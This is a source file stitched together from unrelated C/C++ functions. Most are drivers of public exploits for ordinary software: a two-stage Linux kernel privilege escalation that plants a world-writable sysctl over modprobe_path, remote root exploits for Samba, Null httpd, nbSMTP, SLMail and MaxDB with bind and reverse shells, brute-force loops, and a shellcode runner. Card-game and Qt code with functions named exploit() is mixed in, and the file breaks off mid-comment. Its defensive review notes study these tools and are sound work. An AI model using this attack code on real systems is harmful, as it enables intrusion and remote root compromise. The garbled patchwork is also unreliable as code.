/*
 * Stage driver of a two-stage Linux kernel privilege-escalation exploit
 * (retained as an analysis artefact). Stage 1 makes the vsyscall page
 * writable; stage 2 builds a fake `struct ctl_table` inside that page and
 * registers it. Every VSYSCALL+0x... value is a hard-coded layout guess, and
 * `off` is a table of kernel symbol addresses declared outside this chunk.
 *
 * exploit() is defined elsewhere; from its three call sites it presumably
 * invokes the kernel routine whose address is passed first, with the second
 * value as its argument, and then runs the verify_* callback — confirm
 * against its definition. No return value; failures are only visible
 * through the verify callbacks.
 *
 * Defender's view: the observable artefact is a new, world-writable
 * (mode 0666) sysctl entry whose backing data is `modprobe_path`, i.e. a
 * sysctl that lets an unprivileged writer change the modprobe helper path.
 */
void wrapper(void)
{
    struct ctl_table *c;

    fprintf(stderr, "exploit starting\n");
    printf("making vsyscall page writable..\n\n");
    /* stage 1: set_memory_rw(VSYSCALL) via the kernel-call primitive */
    exploit(off->set_memory_rw, VSYSCALL, verify_stage1);
    printf("\nstage 1 completed\n");
    sleep(5);

    printf("registering new sysctl..\n\n");
    /* stage 2: lay out the fake table at VSYSCALL+0x850 (1952 bytes zeroed),
     * the name string at +0xf00 and a little-endian int 1 at +0xe00 */
    c = (struct ctl_table *)(VSYSCALL+0x850);
    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
    strcpy((char *)(VSYSCALL+0xf00),"hack");
    memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;                               /* world-writable entry */
    c->proc_handler = (void *)(off->proc_dostring);
    c->data = (void *)(off->modprobe_path);       /* the string the sysctl edits */
    c->maxlen=256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);         /* +0xd00 is left zeroed */
    /* register_sysctl_table(&fake_table) via the same primitive */
    exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);
    printf("stage 2 completed\n");
}
/*
 * Entry point of a remote exploit client: connects to argv[1]:PORT and hands
 * the socket to exploit() (defined elsewhere) in bind-shell mode (2 args) or
 * connect-back mode (4 args: host, callback ip, callback port).
 *
 * Review notes (code left byte-identical):
 *  - `remote_addr` is never zeroed, so sin_zero holds stack garbage;
 *  - the socket() result `s` is passed to connect() unchecked (-1 on failure);
 *  - the "connecting to" line has no trailing newline and no fflush(), so it
 *    may appear after "failed!"/"ok!" when stdout is not a terminal;
 *  - inet_addr() yields a 32-bit in_addr_t; XOR-ing with 0x99999999 as an
 *    unsigned long only matters for how exploit() consumes `cbip`;
 *  - atoi(argv[3]) is unvalidated (0 on junk); main falls off the end, which
 *    is 0 under C99 but undefined under C89.
 */
int main ( int argc, char* argv[] )
{
    int s;
    unsigned long cbip;
    unsigned short cbport;
    struct sockaddr_in remote_addr;
    struct hostent* host_addr;

    /* accept exactly 2 or exactly 4 arguments (nested-if form of argc != 2 && argc != 4) */
    if ( argc != 2 )
        if ( argc != 4 ) {
            fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] );
            exit ( 1 );
        }
    if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) {
        fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] );
        exit ( 1 );
    }
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );   /* h_addr: legacy alias for h_addr_list[0] */
    remote_addr.sin_port = htons ( PORT );                                   /* PORT: file-scope constant */
    s = socket ( AF_INET, SOCK_STREAM, 0 );                                  /* unchecked */
    printf ( "connecting to %s:%u...", argv[1], PORT );
    if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) {
        printf ( "failed!\n" );
        exit ( 1 );
    }
    printf ( "ok!\n" );
    if ( argc == 4 ) {
        /* callback ip/port are XOR-obfuscated before being handed to exploit() */
        cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
        cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
        exploit ( s, cbip, cbport, 0 );
    }
    else
        exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );  /* last arg 1 = bind-shell mode */
}
/*
 * Same two-stage kernel-exploit driver as the fprintf/printf variant above,
 * with the kernel addresses taken from macros (SET_MEMORY_RW, PROC_DOSTRING,
 * MODPROBE_PATH, REGISTER_SYSCTL_TABLE) and the sysctl name from SYSCTL_NAME.
 * `dprintf` is called with a single format argument, so it must be a project
 * logging macro/function rather than POSIX dprintf(fd, ...).
 *
 * exploit() is defined elsewhere; presumably it invokes the kernel routine
 * at the first argument's address with the second as its argument and then
 * runs the verify_* callback — confirm against its definition.
 *
 * Defender's view: the artefact is a world-writable (0666) sysctl entry whose
 * backing data is modprobe_path; all VSYSCALL+0x... offsets are hard-coded
 * layout assumptions.
 */
void wrapper(void)
{
    struct ctl_table *c;

    dprintf("[.] making vsyscall page writable...\n\n");
    /* stage 1: set_memory_rw(VSYSCALL) */
    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
    dprintf("[~] done, stage 1 completed\n");
    sleep(5);

    dprintf("[.] registering new sysctl...\n\n");
    /* stage 2: fake ctl_table at +0x850, name at +0xf00, int 1 at +0xe00 */
    c = (struct ctl_table *)(VSYSCALL+0x850);
    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;                          /* world-writable entry */
    c->proc_handler = (void *)(PROC_DOSTRING);
    c->data = (void *)(MODPROBE_PATH);       /* the string the sysctl edits */
    c->maxlen = 256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);    /* +0xd00 stays zeroed */
    /* register_sysctl_table(&fake_table) */
    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
    dprintf("[~] done, stage 2 completed\n");
}
/*
 * Command dispatcher for a device tool (stuff(), exploit(), device_autoboot(),
 * device_upload() are defined elsewhere). As written it cannot behave as the
 * branch structure suggests — left byte-identical, with the review here:
 *  - the parameter order is reversed from the standard
 *    `int main(int argc, char *argv[])`, so the first parameter (`argv`)
 *    receives the argument count and the second (`argc`) the vector;
 *  - `argv[0] == "-x"` compares pointer values, not string contents
 *    (strcmp is needed), and `|| "-X"` is a non-null string literal, i.e.
 *    always true: the first branch is taken unconditionally and the
 *    device_autoboot / device_upload / "Command not found" branches are
 *    unreachable;
 *  - argv[0] is conventionally the program name; the flag was presumably
 *    meant to come from argv[1] — confirm against the intended usage.
 * Returns 1 after any action, -1 for an unknown command (as intended).
 */
int main(char* argv[], int argc){
    stuff();
    if (argv[0] == "-x" || "-X") {            /* always true, see note above */
        exploit();
        return 1;
    } else if (argv[0] == "-b" || "-B") {     /* unreachable */
        device_autoboot();
        return 1;
    } else if (argv[0] == "-f" || "-F") {     /* unreachable */
        device_upload(argv[1]);
        return 1;
    } else {                                  /* unreachable */
        printf("Command not found\n");
        return -1;
    }
}
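// Slot for the "read xml" button: loads <appdir>/nmap/scan.xml, pulls the
// port/service columns into the table via xmlRead(), runs exploit() (a
// project function, defined elsewhere) and resizes the table rows.
//
// Fix: the original reported open/parse failures in a message box but then
// fell through and walked an empty document anyway; both error paths now
// return early so nothing downstream runs on missing or invalid input.
void MainWindow::on_pushButton_3_clicked() // read xml
{
    QDomDocument documento;
    QFile ficheiro(QApplication::applicationDirPath() + "/nmap/scan.xml");

    if (!ficheiro.open(QIODevice::ReadOnly | QIODevice::Text)) {
        QMessageBox::critical(this, "Unable to read file", "There was an error opening the XML file!");
        return;
    }

    // Parse the whole file, then release the handle regardless of outcome.
    const bool parsed = documento.setContent(&ficheiro);
    ficheiro.close();
    if (!parsed) {
        QMessageBox::critical(this, "Parsing Error", "Error while parsing the XML file information!");
        return;
    }

    QDomElement raiz = documento.firstChildElement();
    // (element, attribute, destination column) — see xmlRead() for the column mapping
    xmlRead(raiz, "port", "portid", 0);
    xmlRead(raiz, "service", "name", 1);
    xmlRead(raiz, "service", "product", 2);
    xmlRead(raiz, "service", "version", 3);
    exploit();
    ui->tableWidget->resizeRowsToContents();
}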
//This method executes the policy pair<vector<float>,float> CDACN::policy(const Window &window) { if(uniform_real(engine)<exploration_rate_ or not window.full()) return explore(); else return exploit(window); }
/*
 * OK here is how we brute force.
 * We need to find two values... a valid chunk to free (our fake chunk)
 * and the pvpbuf addr
 * Since our fake chunk is repeated all over and is 4*5 bytes long,
 * we have 5 possibilites of error in a sequencial search. We try for:
 * chunk,chunk+4,chunk+8,chunk+12,chunk+16
 *
 * pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else
 * the exploit will fail since we cannot overwrite bufp. We start from bruteforcing ebp + target.bufp
 * decreasing by 4 bytes
 *
 */
/*
 * Review notes: `target` is passed by value, so the pvpbuf/chunk values found
 * here are not visible to the caller — success is only reported via printf.
 * The search is bounded by `target.ebp - target.pvpbuf < 2000`; with the
 * inner 5-step chunk sweep that is at most 5 * 500 exploit() attempts.
 * The "0x%x" conversions assume the struct fields are int-sized; on LP64
 * they would need "%lx" if the fields are long — cannot tell from here.
 * exploit() is defined elsewhere; its non-zero return is treated as success.
 */
void bruteforce(struct target_info target)
{
    int cincrease = 0; /* how many times we increased chunk value */

    target.pvpbuf = target.ebp+target.bufp;
    printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
    while(target.ebp - target.pvpbuf < 2000) { /* exploit will fail since pvpbuf < 2000 bytes */
        if(exploit(target)) {
            printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk);
            return;
        }
        /* make sure it is a "usable" address ... start with a base of 0x0a since u have space untill 0xfe */
        target.chunk+=4;
        cincrease++;
        if(cincrease > 4) {
            /* after 5 chunk offsets, rewind chunk and move pvpbuf down one word */
            target.chunk -= cincrease*4; /* start at initial value again */
            cincrease =0;
            target.pvpbuf -= 4;
            printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
        }
    }
    printf("Bruteforce failed\n");
}
/*
 * Entry point: parses -t target / -p port / -h into the file-scope globals
 * `target` and `port`, then sweeps return addresses from START down to STOP
 * in OFFSET steps, calling hate(ret) and exploit() (both defined elsewhere)
 * for each candidate.
 *
 * Review notes (code left byte-identical):
 *  - `case 'h'` has no break and falls into `default`; harmless only because
 *    usage() presumably exits — confirm;
 *  - `ret` is unsigned long but printed with "%x" (should be "%lx"); on LP64
 *    this is a format/argument mismatch;
 *  - the loop condition `ret >= STOP` on an unsigned value never becomes
 *    false if STOP is 0 (ret wraps instead of going negative) — depends on
 *    the values of START/STOP/OFFSET, which are not visible here.
 */
int main (int argc, char * argv[])
{
    int c;
    unsigned long ret;

    while((c=getopt (argc, argv, "ht:p:")) != EOF) {
        switch(c) {
            case 't':
                target = optarg;
                break;
            case 'p':
                port = atoi (optarg);
                break;
            case 'h':
                usage (argv[0]);
                /* falls through */
            default :
                usage (argv[0]);
        }
    }
    if (argc==1 || target == NULL)
        usage (argv[0]);

    fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
    fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
    fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
    fprintf (stdout, " [-] stating bruteforce\n\n");

    /* descending address sweep; each step sends one attempt */
    for (ret=START; ret>=STOP; ret-=OFFSET) {
        fprintf (stdout, " [-] testing 0x%x\n", ret);
        hate (ret);
        exploit ();
    }
    fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
    return 0;
}
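// Deals pre-defined hands: tefudaSet[i] is a string of two-letter card codes
// (suit letter from "SHDCJ", rank letter from "3456789XJQKA2R"), blanks
// skipped, one string per player. Dealing starts from the DAIFUGO player's
// seat when ranks are unequal, otherwise from seat 0, and rotates one seat
// per hand string. The fifth suit letter (J) lands in cards[4][1]; any other
// card in cards[suit][rank + 1]. Finally the tribute (搾取) exchange, if due,
// is run by exploit() (a project function, defined elsewhere).
//
// Fixes relative to the previous version:
//  - `j < length() - 1` underflows on an empty hand string (size_t wrap), so
//    the loop now uses `j + 1 < length()`;
//  - tefudaSet is indexed up to config.PLAYER_NUM without a size check;
//    a short vector now exits via the same exit(1) path as a malformed code.
void Game::dealCards( Result *result, vector<string> &tefudaSet){
    COUT << "dc" << endl;

    // Starting seat: the DAIFUGO player if there is a rank gap, else the first seat.
    int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);
    const string suit = "SHDCJ";
    const string rank = "3456789XJQKA2R";

    // Reset every player's hand before dealing.
    for (int i = 0; i < players.size(); i++) {
        players.id[i].initCard();
    }

    for (int i = 0; i < config.PLAYER_NUM; i++) {
        if (static_cast<size_t>(i) >= tefudaSet.size()) {
            exit(1); // fewer hand strings than players — same failure path as a bad code
        }
        const string &hand = tefudaSet[i];

        // Each code is two characters; j + 1 must be a valid index.
        for (size_t j = 0; j + 1 < hand.length(); j++) {
            if (hand[j] == ' ') {
                continue;
            }
            const size_t s = suit.find(hand[j]);
            j++; // advance to the rank letter
            const size_t r = rank.find(hand[j]);
            if (s == string::npos || r == string::npos) {
                exit(1); // malformed card code
            }

            if (s == 4) {
                players.id[players.sekijun[target]].cards[ 4 ][ 1 ] = 1; // joker slot
            } else {
                players.id[players.sekijun[target]].cards[ s ][ r + 1 ] = 1;
            }
            players.id[players.sekijun[target]].cards_num++;
        }

        // next seat
        target = ( target + 1 ) % ( players.size() );
    }

    // Run the tribute exchange if one is due.
    exploit( result );
}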
/*
 * Entry point of a remote exploit client: validates argv[1] as an IP,
 * prompts for one of two entries in the file-scope `target[]` table,
 * connects to argv[1]:PORT, runs exploit(s, ret) and, on success, connects to
 * a bind shell on port 4444. header(), isip(), exploit() and
 * connect_to_bindshell() are defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - system("clear") spawns a shell just to clear the screen;
 *  - scanf("%d", &targ) is unchecked, so `targ` may be uninitialized on a
 *    non-numeric answer (it is then compared against 0 and 1);
 *  - `remote_addr` is never zeroed (sin_zero is stack garbage);
 *  - the "connecting to" message has no newline/fflush, so ordering with the
 *    following output is not guaranteed off a terminal;
 *  - exploit() returning 1 is the failure convention here;
 *  - main has no return statement (0 under C99, undefined under C89).
 */
int main ( int argc, char* argv[] )
{
    int s, targ, i;
    struct sockaddr_in remote_addr;
    struct hostent* host_addr;

    if ( argc != 2 ) {
        printf ( "Usage: %s <ip>\n", argv[0] );
        exit ( 1 );
    }
    system ( "clear" );
    header ();
    if ( !isip ( argv[1] ) ) {
        printf ( "Invalid Target IP!\n" );
        exit ( 1 );
    }

    /* interactive target selection from the two-entry table */
    printf("--[ select target\n");
    for ( i = 0; i < 2; i++ )
        printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
    printf ( " >> " );
    scanf ( "%d", &targ );
    /* nested-if form of (targ != 0 && targ != 1) */
    if ( targ != 0 )
        if ( targ != 1 ) {
            printf ( "--[ invalid target!\n" );
            exit ( 1 );
        }

    if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) {
        fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
        exit ( 1 );
    }
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    remote_addr.sin_port = htons ( PORT );   /* PORT: file-scope constant */
    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) {
        printf ( "socket failed!\n" );
        exit ( 1 );
    }
    printf ( "--[ connecting to %s:%u...", argv[1], PORT );
    if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) {
        printf ( "failed!\n" );
        exit ( 1 );
    }
    printf ( "done!\n" );

    if ( exploit ( s, target[targ].ret ) == 1 ) {
        printf ( "exploitation FAILED!\n" );
        exit ( 1 );
    }
    close ( s );
    connect_to_bindshell ( argv[1], 4444 );
}
/*
 * Entry point: parses -h host, -p port, -t target-index and calls
 * exploit(host, port, type) (defined elsewhere; negative return = failure).
 * `targets[]` and usage() are file-scope.
 *
 * Review notes (code left byte-identical):
 *  - the target count is computed as sizeof(targets)/12, i.e. the element
 *    size is hard-coded instead of sizeof(targets[0]); this silently breaks
 *    if the struct layout or padding changes;
 *  - `i`/`type` are int but compared with the size_t result, so negative
 *    values of `type` (from atoi) slip past the `type > ...` check and
 *    presumably index targets[type-1] inside exploit() — confirm there;
 *  - host[] is zeroed first and strncpy copies at most sizeof-1 bytes, so
 *    the buffer stays NUL-terminated (truncation is silent);
 *  - the "%d" for `i + 1` is fine; `ret`/`retloc` are printed with %08x,
 *    which assumes 32-bit fields.
 */
int main (int argc,char *argv[])
{
    char host[256];
    int i,opt,type=0,port=80;

    fprintf(stdout,"Null httpd 0.5.0 remote root exploit by eSDee of Netric\n");
    fprintf(stdout,"--------------------------------------------------(www.netric.org)\n");
    memset(host, 0x0, sizeof(host));

    while((opt=getopt(argc,argv,"h:p:t:")) !=EOF) {
        switch(opt) {
            case 'h':
                strncpy(host, optarg, sizeof(host) - 1);   /* NUL kept by the memset above */
                break;
            case 'p':
                port=atoi(optarg);
                if ((port <= 0) || (port > 65535)) {
                    fprintf(stderr,"Invalid port.\n\n");
                    return -1;
                }
                break;
            case 't':
                type=atoi(optarg);
                /* -t0 or an index past the table prints the list and exits */
                if (type == 0 || type > sizeof(targets)/12) {
                    for(i = 0; i < sizeof(targets)/12; i++)
                        fprintf(stderr, "%d. %s\t (0x%08x - 0x%08x)\n", i + 1, targets[i].type, targets[i].ret,targets[i].retloc);
                    fprintf(stderr, "\n");
                    return -1;
                }
                break;
            default:
                usage(argv[0]);
                break;
        }
    }
    if (strlen(host) == 0)
        usage(argv[0]);
    if (!type) {
        fprintf(stderr, "No target given, use -t0 for a list.\n\n");
        return -1;
    }
    if (exploit(host, port, type) < 0) {
        fprintf(stderr, "Failed.\n\n");
        return -1;
    }
    return 0;
}
/*
 * Entry point: selects a return address and shellcode address either from the
 * file-scope `targets[]` table (-t N) or manually (-r/-s, plus -o offset),
 * prints the choice and calls exploit(retaddr, shaddr) (defined elsewhere).
 *
 * Review notes (code left byte-identical):
 *  - `opt` is `char` and compared with EOF; on platforms where char is
 *    unsigned the loop never terminates (use int);
 *  - `targetnum = atoi(optarg)-1` is not range-checked before
 *    targets[targetnum] is read, so "-t 0" or junk indexes at -1 (UB);
 *    the `.num` sentinel test only catches the end of the table;
 *  - `retaddr`/`shaddr` are int but printed with "%010p" (expects a pointer);
 *  - the local named `system` shadows the libc function of the same name
 *    inside this block;
 *  - main has no return statement.
 */
int main(int argc, char *argv[])
{
    char opt, *system=NULL;
    int shaddr=0, retaddr=0, targetnum=0, offset=0, i;

    printf("\n nbSMTP v0.99 remote format string exploit\n");
    printf(" by CoKi <*****@*****.**>\n\n");

    while((opt = getopt(argc,argv,"r:s:t:lo:")) != EOF) {
        switch (opt) {
            case 'r':
                retaddr = strtoul(optarg,NULL,0);
                system = "unknown";
                break;
            case 's':
                shaddr = strtoul(optarg,NULL,0);
                break;
            case 't':
                targetnum = atoi(optarg)-1;          /* unchecked index, see note */
                if(targets[targetnum].num) {
                    system = targets[targetnum].os;
                    retaddr = targets[targetnum].retaddr;
                    shaddr = targets[targetnum].shaddr;
                }
                else use(argv[0]);
                break;
            case 'l':
                printlist();
                break;
            case 'o':
                offset = atoi(optarg);
                shaddr += offset;                    /* order-dependent: -o must follow -t/-s */
                break;
            default:
                use(argv[0]);
                break;
        }
    }
    if(retaddr == 0) use(argv[0]);
    if(shaddr == 0) use(argv[0]);
    if(system == NULL) {
        system = "unknown";
    }

    printf(" [*] system\t\t\t: %s\n", system);
    printf(" [*] return address\t\t: %010p\n", retaddr);
    printf(" [*] shellcode address\t\t: %010p", shaddr);
    fflush(stdout);
    if(offset) printf(" (offset %d)\n", offset);
    else printf("\n");

    exploit(retaddr, shaddr);
}
/*
 * Entry point: parses arguments into `myargs` (type `args`, project-defined),
 * connects to the target, asks interactively for bind (0) or connect-back (1)
 * shellcode, runs exploit() with the addresses from the file-scope `target[]`
 * table and then either connects to a bind shell (port 20000) or starts a
 * reverse handler (port 45295). exploit() returns 1 on failure.
 *
 * Review notes (code left byte-identical):
 *  - system("clear") spawns a shell just to clear the screen;
 *  - scanf("%d", &option) is unchecked, so `option` may be uninitialized on
 *    a non-numeric answer (the switch default then catches garbage only by
 *    luck);
 *  - `myargs.target` indexes target[] with no visible bound check — it may
 *    be validated inside parse_arguments(); confirm there;
 *  - connect_to_remote_host()'s result `s` is not checked before use.
 */
int main ( int argc, char* argv[] )
{
    int s, option;
    args myargs;

    system ( "clear" );
    header ();
    parse_arguments ( argc, argv, &myargs );
    s = connect_to_remote_host ( myargs.tip, myargs.tport );

    printf ( "--[ select shellcode\n" );
    printf ( " |\n" );
    printf ( " |- [0] bind\n" );
    printf ( " `- [1] cb\n" );
    printf ( ">> " );
    scanf ( "%d", &option );

    switch ( option ) {
        case 0:
            printf ( "--[ using bind shellcode\n" );
            if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) {
                printf ( "exploitation failed!\n" );
                exit ( 1 );
            }
            connect_to_bindshell ( myargs.tip, 20000 );
            break;
        case 1:
            printf ( "--[ using cb shellcode\n" );
            /* last argument: local ip for the connect-back payload */
            if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 ) {
                printf ( "exploitation failed!\n" );
                exit ( 1 );
            }
            start_reverse_handler ( 45295 );
            break;
        default:
            printf ( "--[ invalid shellcode!\n" );
            exit ( 1 );
    }
    close ( s );
    return 0;
}
/*
 * Shellcode test harness: makes the page holding the file-scope `shellcode`
 * array executable and jumps into it through a function pointer (the local
 * named `exploit` is that pointer, not a function defined elsewhere).
 *
 * Review notes (code left byte-identical):
 *  - `(unsigned)shellcode & 0xfffff000` truncates the pointer to 32 bits; on
 *    LP64 the resulting address is wrong and mprotect() fails (or worse,
 *    targets an unrelated mapping). The portable form is
 *    (uintptr_t)shellcode & ~(uintptr_t)0xfff (or sysconf(_SC_PAGESIZE));
 *  - only 0x1000 bytes are made executable, so a buffer that crosses a page
 *    boundary is only partially covered;
 *  - strlen() stops at the first zero byte, so `size` is only meaningful for
 *    NUL-free payloads; it is printed only on the error path;
 *  - Defender's view: an RWX mprotect() on a data page followed by an
 *    indirect call into it is the classic pattern W^X / NX policies and
 *    EDR hooks look for.
 */
int main()
{
    int size = strlen(shellcode);
    void (*exploit)(void) = (void(*)(void))shellcode;

    /* page-align the buffer address (32-bit only, see note) and make it RWX */
    if(-1== mprotect((void*)((unsigned)shellcode&0xfffff000),0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)){
        perror("mprotect");
        printf("shellcode size = %d\n",size);
        exit(-1);
    }
    exploit();
    return 0;
}
/*
 * Entry point (Windows build — closesocket()): connects to argv[1] on POP3
 * port 110 via connect_target() and hands the socket to exploit(), both
 * defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - `data` is declared but never used;
 *  - connect_target()'s result is not checked before exploit()/closesocket();
 *  - the usage path exits with 0 although no work was done.
 */
int main(int argc, char **argv)
{
    int sock = 0;
    int data, port;

    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");

    if ( argc < 2 ) {
        printf("usage: slmail-ex.exe <host> \n\n");
        exit(0);
    }

    port = 110;   /* POP3 */
    sock = connect_target(argv[1], port);
    exploit(sock);
    closesocket(sock);
    return 0;
}
// Deals a freshly shuffled deck to the players at the table.
//
// Cards are encoded as suit*14 + rank (suit 0..3, rank 1..13) plus
// config.JOKER_NUM jokers encoded as 14*4 + 1, so that a code decodes into
// cards[code/14][code%14]. The deck is shuffled by 2*deck.size() random
// pairwise swaps (two random->rand() draws per swap, in order), then handed
// out one card at a time, rotating the seat after each card, starting from
// the DAIFUGO player's seat when ranks are unequal and from seat 0 otherwise.
// The initial hands are recorded on `result`, and the tribute (搾取)
// exchange, if due, is run by exploit() (a project function, defined
// elsewhere).
//
// NOTE(review): the swap indices come from (size-1)*rand() truncated to int,
// so the last slot is only reached indirectly; reproduced unchanged to keep
// the random-number consumption identical.
void Game::dealCards( Result *result){
    COUT << "dc" << endl;

    // Build the deck: 4 suits x 13 ranks, then the jokers.
    vector<int> deck;
    for (int suit = 0; suit < 4; ++suit) {
        for (int rank = 1; rank <= 13; ++rank) {
            deck.push_back(suit * 14 + rank);
        }
    }
    for (int joker = 0; joker < config.JOKER_NUM; ++joker) {
        deck.push_back(14 * 4 + 1);
    }

    // Shuffle by random pairwise swaps.
    for (int pass = 0; pass < deck.size() * 2; ++pass) {
        int first = (int)((deck.size() - 1) * random->rand());
        int second = (int)((deck.size() - 1) * random->rand());
        int held = deck[first];
        deck[first] = deck[second];
        deck[second] = held;
    }

    // Clear every hand before dealing.
    for (int p = 0; p < players.size(); ++p) {
        players.id[p].initCard();
    }

    // Starting seat: DAIFUGO player if there is a rank gap, else the first seat.
    int seat = players.convIDtoSekiNum(
        players.isInequality() ? players.mibunId(DAIFUGO) : players.sekijun[0]);

    // Hand out deck[0], deck[1], ... in order, one seat per card.
    for (size_t k = 0; k < deck.size(); ++k) {
        int code = deck[k];
        players.id[players.sekijun[seat]].cards[code / 14][code % 14] = 1;
        players.id[players.sekijun[seat]].cards_num++;
        seat = (seat + 1) % (players.size());
    }

    // Snapshot of the dealt hands for the result record.
    int initialHands[5][8][15] = {{0}};
    for (int p = 0; p < players.size(); ++p) {
        copyCard(initialHands[p], players.id[p].cards);
    }
    result->setFirstCards(initialHands);

    // Run the tribute exchange if one is due.
    exploit(result);
}
/*
 * Entry point: resolves argv[1], fills the file-scope `host` sockaddr_in
 * (port from argv[2], default 9999), connects via connect_port(), sends the
 * payload with exploit(), then connects to the spawned shell on 13370 and
 * hands it to shell(). banner(), usage(), connect_port(), exploit() and
 * shell() are defined elsewhere; connect_port() returns 0 on failure.
 *
 * Review notes (code left byte-identical):
 *  - errx() appends its own newline, so "Unresolvable address\n" prints a
 *    blank line;
 *  - memcpy() copies hn->h_length bytes into sin_addr; gethostbyname()
 *    returns AF_INET records so this is 4 bytes in practice, but there is no
 *    check that h_addrtype is AF_INET;
 *  - atoi(argv[2]) is unvalidated (0 on junk, truncated to u_short);
 *  - connect_port() takes only a port, so it must read the file-scope `host`
 *    for the address — presumably; confirm in its definition.
 */
int main(int argc, char **argv)
{
    int sock_maxdb, sock_shell;
    struct hostent *hn;

    banner();
    if (argc < 2)
        usage(argv[0]);

    memset(&host, 0, sizeof(host));
    host.sin_family = AF_INET;
    host.sin_port = (argc > 2) ? htons((u_short)atoi(argv[2])) : htons(9999);
    if ( (hn = gethostbyname(argv[1])) == NULL)
        errx(-1, "Unresolvable address\n");
    memcpy(&host.sin_addr, hn->h_addr, hn->h_length);

    printf("[*] Connecting to %s:%d... ", inet_ntoa(host.sin_addr), ntohs(host.sin_port));
    fflush(stdout);
    sock_maxdb = connect_port(ntohs(host.sin_port));
    if (!sock_maxdb) {
        printf("failure.\n\n");
        exit(-1);
    }
    printf("success.\n");

    printf("[*] Sending evil payload...\n");
    exploit(sock_maxdb);
    close(sock_maxdb);
    fflush(stdout);
    sleep(1);   /* give the remote side time to start the listener */

    printf("[*] Trying to connect to spawned shell... ");
    sock_shell = connect_port(13370);
    if (!sock_shell) {
        printf("failure.\n\n");
        exit(-1);
    }
    printf("success!\n\nEnjoy :)\n\n");
    shell(sock_shell);
    return 0;
}
/*
 * Entry point: dispatches -t (target index into the file-scope `target[]`),
 * -b (bruteforce) and -o (manual offset) to exploit()/bruteforce(), defined
 * elsewhere, with esp() supplying a stack-address estimate.
 *
 * Review notes (code left byte-identical; several of these look like real
 * bugs rather than style):
 *  - `sel` is only set by -t/-o, so `-b` given first (or alone) reads the
 *    uninitialized `sel` in target[sel-1] — undefined behaviour;
 *  - `offset` is declared `char *` but assigned the int from atoi(); the
 *    subsequent `esp()+offset` is then pointer+pointer-ish arithmetic that
 *    only compiles with diagnostics — `offset` was presumably meant to be
 *    `long`/`int`;
 *  - in `case 'o'` the same optarg is reused as the target index
 *    (`sel = atoi(optarg)`), so the offset value doubles as the table index;
 *  - `usage((char **)argv[0])` casts a `char *` to `char **`, while the
 *    default case passes `&argv[0]`; one of the two is wrong;
 *  - no index range check before target[sel-1].
 */
int main(int argc, char **argv)
{
    int cnt, sel;
    char *offset;
    long returnaddr;

    if(argc == 1) {
        usage((char **)argv[0]);
        exit(1);
    }

    while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) {
        switch(cnt) {
            case 't':
                //target distro
                sel = atoi(optarg);
                exploit(target[sel-1].ret,(char **)target[sel-1].path);
                break;
            case 'b':
                //brute force
                bruteforce((char **)target[sel-1].path);   /* sel may be uninitialized here */
                break;
            case 'o':
                //offset
                offset = atoi(optarg);
                returnaddr=esp()+offset;
                sel = atoi(optarg);
                exploit(returnaddr,(char **)target[sel-1].path);
                break;
            default:
                usage(&argv[0]);
                break;
        }
    }
    return(0);
}
/*
 * Entry point: picks an entry of the file-scope `targets[]` table (-t N,
 * default 0), then either runs bruteforce(targets[t]) (-b, the default) or a
 * single exploit(targets[t]) attempt whose non-zero return means success.
 * bruteforce(), exploit() and usage() are defined elsewhere.
 *
 * Review notes (code left byte-identical):
 *  - the range check compares the int `t` with a size_t; a negative `t`
 *    converts to a huge unsigned value and is correctly rejected, so the
